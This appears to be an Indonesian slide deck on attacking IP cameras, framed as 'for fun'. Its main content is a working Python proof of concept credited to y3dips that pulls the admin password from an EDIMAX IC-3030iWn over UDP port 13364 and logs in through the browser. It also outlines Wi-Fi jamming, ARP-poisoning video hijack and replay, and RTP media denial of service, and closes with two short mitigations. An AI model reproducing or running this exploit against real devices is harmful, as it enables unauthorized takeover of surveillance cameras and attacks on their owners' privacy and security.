Pwned IP Camera for phun: POC (0day) exploit for EDIMAX IC-3030iWn - Hero
1. IP Camera : PWNED for Fun
by. Mr. Pick
Internet Protocol Camera biasa disebut dengan IP Camera adalah tipe kamera digital
yang biasa digunakan untuk melakukan pengawasan.
Ada beberapa macam IP Camera , diantaranya adalah :
1. Centralized IP Camera
IP Camera jenis ini membutuhkan Network Video Recorder (NVR) untuk menangani
beberapa IP Camera yang terpasang dan dapat melakukan monitoring serta
perekaman video.
2. Decentralized IP Camera
IP Camera ini tidak membutuhkan Network Video Recorder (NVR), kamera ini
mempunyai fungsi recoding didalamnya dan dapat disimpan secara langsung melalui
media simpan seperti flash disk, hardisk, dan NAS.
2. Layaknya sebuah komputer, IP Camera juga memiliki IP Address yang dapat terhubung
pada jaringan kabel ataupun jaringan wireless.
IP camera pada saat ini, pada umumnya memiliki fungsi untuk menjalankan Web Server,
FTP, Email, Networking dan Security Protocols. IP Camera dapat secara langsung
melakukan streaming dengan kualitas MJPEG, MPEG-4 atau menggunakan H.264 melalui
beberapa Network Protocols.
Network Protocol yang biasa digunakan untuk melakukan streaming video pada IP
Camera adalah HTTP streaming dan Real-time Transport Protocol (RTP). RTP ditetapkan
sebagai stardar format paket yang digunakan untuk mengirimkan audio dan video
melalui Internet Protocol (IP).
3. Pada kali ini, akan disampaikan beberapa teknik yang digunakan untuk melakukan
kegiatan attacking terhadap IP Camera. Yes for Fun only...., diantaranya :
1. IP Camera PWNED
Yaitu teknik mengambil alih sepenuhnya IP Camera. Get Root !! ya, dengan
memanfaatkan kelemahan teknik pengiriman password pada port=13364.
Dengan Xploit ini dibuat oleh y3dips, digunakan untuk melakukan penyerangan
terhadap IP Camera, yaitu IP Camera Edimax series IC-3030iWn.
xploitnya :
------------
import socket
import webbrowser
#target="192.168.1.22"
def read_pw():
devmac = "xffxffxffxffxffxff"
target="192.168.1.22"
port=13364
#code="x00x02xffxfd" #broadcast reply
code="x00x06xffxf9"
data=devmac+code
sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.connect((target,port))
try:
sock.send(data)
sock.settimeout(15)
tmp = sock.recv(4096)
4. return tmp
except socket.timeout:
return None
def call_browser(target, pw):
webbrowser.get("firefox" ).open('http://admin/:'+pw+'@'+target+'/index.a
sp')
def main():
data=read_pw()
data= data[365:377]
if data != None:
pw=data.strip("x00")
print pw
call_browser(target, pw)
else:
print "Socket timeOut"
main()
2. IP Camera Jamming
Banyak sekali orang mempergunakan IP Camera berbasis wireless dengan alasan
mudah dalam implementasinya, tinggal koneksi ke Radio AP saja. Nah, analisisnya
disini saya akan melakukan kegiatan jamming terhadap Radio AP sehingga IP Camera
kehilangan koneksi terhadap Radio AP, sehingga IP Camera tidak bisa lagi melakukan
kegiatan monitoring.
5. Kegiatan jamming dilakukan dengan aplikasi jamming dengan konsep penyerangan
langsung pada channel yang digunakan oleh Radio AP.
3. IP Video Replay Attack
Hal apa lagi yang bisa kita lakukan terhadap IP Camer ? Ya, IP Video Replay Attack,
yaitu teknis kegiatan Video Hijack terhadap IP Camera dengan menjalankan ARP
Poisoning terhadap area network.
6. Karena komunikasi data antara Client (--dalam hal ini user) dengan IP Camera tidak
terenkripsi maka attacker mencoba melakukan dump sebuah file *.pcap menjadi RTP
sessions yang diencode dengan h.264 video codec. Selain sniffing yang bisa dilakukan
ada hal lain yang bisa dilakukan seiring ARP Poisoning, diantaranya :
- attack an active video call by sending garbage video payload
- plays the video file on the active video conference
- attack an active video call by dropping video packets
4. Media Denial Of Service
Tehnik menyerang IP Camera yang diawali dengan ARP Poison dan dilajutkan
menggunakan custom video payload dengan merubah sequence number dan nilai
timestamp yang digunakan oleh packet RTP yang asli. Setelah user memilih target
video device yang ingin diserang pada saat session berlangsung, videojak
mengirimkan payload melalui RTP port yang sudah di custom kepada target.
Mengirimkan packet audio dan video secara random kepada target, sehingga kualitas
suara dan video menurun.
Solusi2 Penyerangan :
1. Mematikan fungsi wireless dan tatap memanfaatkan Cable RJ45
2. Upgrade Firmware dengan firware terbaru
Salam,
M. Pick